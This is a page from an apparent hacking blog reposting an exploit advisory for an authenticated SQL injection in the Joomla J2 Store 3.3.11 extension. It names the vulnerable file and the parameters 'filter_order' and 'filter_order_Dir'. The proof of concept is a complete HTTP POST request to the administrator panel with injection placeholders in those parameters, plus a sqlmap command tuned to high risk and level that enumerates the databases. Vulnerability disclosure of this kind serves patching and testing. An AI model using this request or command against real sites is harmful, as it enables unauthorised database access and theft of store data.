Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86373670

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
# Date: 2020-04-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://www.j2store.org/
# Software Link: https://www.j2store.org/download.html
# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html
# Version: 3.3.11
# Tested on: Kali Linux - Apache2
--------------------------------------------------------------------------------
Detail:
--------------------------------------------------------------------------------
File: administrator/components/com_j2store/models/products.php
Vulnerable parameter: filter_order_Dir, filter_order

PoC:
Request:
--------------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products
Content-Type: application/x-www-form-urlencoded
Content-Length: 312
Connection: close
Cookie: [COOIKE]
Upgrade-Insecure-Requests: 1

option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0
--------------------------------------------------------------------------------



sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir

--------------------------------------------------------------------------------